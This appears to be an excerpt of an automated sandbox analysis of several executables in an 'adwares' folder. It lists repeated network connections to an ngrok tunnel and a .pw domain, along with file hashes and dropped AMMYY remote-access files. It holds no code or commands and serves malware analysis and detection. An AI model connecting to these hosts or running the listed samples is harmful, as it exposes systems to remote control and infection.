US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 53.121.117.34.in-addr.arpa udp
NL 194.169.175.123:50500 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 123.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
NL 194.169.175.123:50500 tcp
NL 194.169.175.123:50500 tcp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 datalake.abuse.ch udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 aus5.mozilla.org udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.244.181.201:443 prod.balrog.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
NL 194.169.175.128:37853 tcp
US 8.8.8.8:53 128.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 staircompletemil.pw udp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
DE 178.162.202.48:443 datalake.abuse.ch tcp
US 8.8.8.8:53 datalake.abuse.ch udp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 staircompletemil.pw udp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 188.114.97.0:80 staircompletemil.pw tcp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 188.114.97.0:80 staircompletemil.pw tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 3.12.49.0:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 18.190.57.209:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 3.141.180.35:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 18.223.144.66:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 8.8.8.8:53 9.tcp.ngrok.io udp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp
US 3.16.65.63:22201 9.tcp.ngrok.io tcp

Files

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

MD5 190785b2bb664324334c1b5231b5c4b0
SHA1 07539abb2623fe24b9a05e240f675fa2d15268cb
SHA256 4731517b198414342891553881913565819509086b8154214462788c740b34c9
SHA512 ab40f182fb52e5281f0761cf064a7f4b82ea04a2c9c00fe6faa4e61f8e632b8c7a64820e226b2ab668c99ada195c1ca117b702474bd023d84991a16dd10ba85c

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

MD5 190785b2bb664324334c1b5231b5c4b0
SHA1 07539abb2623fe24b9a05e240f675fa2d15268cb
SHA256 4731517b198414342891553881913565819509086b8154214462788c740b34c9
SHA512 ab40f182fb52e5281f0761cf064a7f4b82ea04a2c9c00fe6faa4e61f8e632b8c7a64820e226b2ab668c99ada195c1ca117b702474bd023d84991a16dd10ba85c

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

MD5 190785b2bb664324334c1b5231b5c4b0
SHA1 07539abb2623fe24b9a05e240f675fa2d15268cb
SHA256 4731517b198414342891553881913565819509086b8154214462788c740b34c9
SHA512 ab40f182fb52e5281f0761cf064a7f4b82ea04a2c9c00fe6faa4e61f8e632b8c7a64820e226b2ab668c99ada195c1ca117b702474bd023d84991a16dd10ba85c

C:\Users\Admin\Desktop\adwares\4731517b198414342891553881913565819509086b8154214462788c740b34c9.exe

MD5 190785b2bb664324334c1b5231b5c4b0
SHA1 07539abb2623fe24b9a05e240f675fa2d15268cb
SHA256 4731517b198414342891553881913565819509086b8154214462788c740b34c9
SHA512 ab40f182fb52e5281f0761cf064a7f4b82ea04a2c9c00fe6faa4e61f8e632b8c7a64820e226b2ab668c99ada195c1ca117b702474bd023d84991a16dd10ba85c

C:\ProgramData\AMMYY\settings3.bin

MD5 4cb889e527b0d0781a17f6c2dd968129
SHA1 6a6a55cd5604370660f1c1ad1025195169be8978
SHA256 2658cd46dd49335e739cafa31ff2ec63f3315b65ecc171a0f7612713d3ac702b
SHA512 297d2c05d2ac950faeb519d3e7bc56ea9d9fcab65b5dfdbba2720be8eddc8b2d5ead3dc7c122b82d6937be6c2d7bb88872dd7b80961138571245fba381daac3f

C:\ProgramData\AMMYY\hr3

MD5 d3921ace21550c8d84d2c4fc06e002a3
SHA1 fab53358868c2d3b220516c5196f49b5896b6895
SHA256 fa8edd25833c7bfc0c2e7e4e7de6d2ba0bf770e40cb53a6b0ce8b05d24a4413e
SHA512 8d22fd28db0954afa949d50a514e1c85fe3bdf9e2d515bb9e949d7349e18eb0361f7034f57e1b4c4f6890afb95883fbe11ff212ae8e9c1b3bd5b1318ebc99d5d

C:\ProgramData\AMMYY\hr

MD5 489385a913a2e7924895d4e5dc983e2c
SHA1 9155b86d92362d204fd19a5bfa9e7b4986df6734
SHA256 acaeeb19ce1ce7b68e27a010b23225f845f1125c2399c29b0cb565d1df650206
SHA512 40063f7ca7605c7b6a94a6887a1fcc1c5ab7e1814ed35d6cf0087a01c1732c3bb0ef7379a388fc93976c30d7dbc835fe3ebc88696f3c9c6d5e77b2d1458f4de4

C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe

MD5 29ffad5f4e22f3e296f4c579ce303902
SHA1 8a037d37c7238c6d9408fd99d50105b1cdb73f7f
SHA256 e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030
SHA512 36373e64e58192d49c831b23ee83f3a38a2d2d4da69f15fd6ec7dff2c4a9ebb5e03a7f05ef0e57ceb0f4176d97774269859a560500d21359f924bf3beb69f227

C:\Users\Admin\Desktop\adwares\e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030.exe

MD5 29ffad5f4e22f3e296f4c579ce303902
SHA1 8a037d37c7238c6d9408fd99d50105b1cdb73f7f
SHA256 e34c196497e534f46dd5f2749af66e2d46e46fd8d78b71badfbe2363d27e8030
SHA512 36373e64e58192d49c831b23ee83f3a38a2d2d4da69f15fd6ec7dff2c4a9ebb5e03a7f05ef0e57ceb0f4176d97774269859a560500d21359f924bf3beb69f227

memory/4600-22-0x0000000000160000-0x00000000009B9000-memory.dmp

memory/4600-25-0x0000000000160000-0x00000000009B9000-memory.dmp

C:\Users\Admin\Desktop\adwares\b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

